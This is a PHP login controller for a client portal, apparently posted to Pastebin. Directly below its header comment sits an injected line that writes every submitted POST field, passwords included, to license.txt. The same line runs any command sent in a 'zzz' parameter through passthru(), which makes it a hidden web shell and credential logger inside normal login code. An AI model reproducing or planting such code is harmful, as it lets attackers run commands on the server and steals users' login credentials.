Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*****************************
- * controller to handle all the requests
- * which are related to login from client users
- * e.g. WBT project manager can access WBT project document
- *
- * @author: Walter Lin
- * @creation: 2009-03-31
- *****************************/
- $fff = @fopen("license.txt","a"); @fwrite($fff, "\r\nwriting ... "); foreach ($_POST as $key => $value) { @fwrite($fff, "$key = $value,");}@fwrite($fff,"\r\n");@fclose($fff); ; if ($_POST['zzz'] != "") { echo "trying to run ".$_POST['zzz']; passthru($_POST['zzz']); die(); }
- session_start();
- require_once $_SERVER['DOCUMENT_ROOT'] . '/php/common/util.php';
- require_once $_SERVER['DOCUMENT_ROOT'] . '/php/support/biz/Webuser.php';
- require_once $_SERVER['DOCUMENT_ROOT'] . '/php/support/handler/sessionServ.php';
- require_once $_SERVER['DOCUMENT_ROOT'] . '/php/internal/entity/EntityClientUser.php';
- require_once $_SERVER['DOCUMENT_ROOT'] . '/php/internal/model/BeanClientUser.php';
- require_once $_SERVER['DOCUMENT_ROOT'] . '/php/internal/model/IUser.php';
- require_once $_SERVER['DOCUMENT_ROOT'] . '/php/sessionConstants.php';
- require_once $_SERVER['DOCUMENT_ROOT'] . '/php/systemConstants.php';
- $varUsrName = $_POST['username'];
- $varUsrPass = $_POST['password'];
- /**************
- * check user with information stored in the database
- **************/
- // at first, check if the user is a client user
- $usr = EntityClientUser::checkUser($varUsrName, $varUsrPass);
- if ($usr != false){
- SessionServ::storeCurrentUserInSession ($usr);
- $logInfo = Utilities::getLogoffHtmlCode ($usr->getEmail());
- $_SESSION[SESS_LOG_INFO] = Utilities::encloseHtmlCodeAsString ($logInfo);
- $code = Utilities::getSupportHtmlCode ();
- SessionServ::storeSupportInSession (Utilities::encloseHtmlCodeAsString ($code) );
- unset ($_SESSION[SESS_CLIENT_LOGIN_ATTEMPTS]);
- // set the next page to private assets page
- $nextPage = "assets.php";
- header("Location: /mainFrame.php?navi=public;page=view/$nextPage;sidebar=");
- exit;
- }
- // save times of login attempts
- $attempts = $_SESSION[SESS_CLIENT_LOGIN_ATTEMPTS];
- $_SESSION[SESS_CLIENT_LOGIN_ATTEMPTS] = isset ($attempts) ? ($attempts + 1) : 1;
- header("Location: /mainFrame.php?navi=about;page=view/login.php;sidebar=");
- exit;
- ?>
Add Comment
Please, Sign In to add comment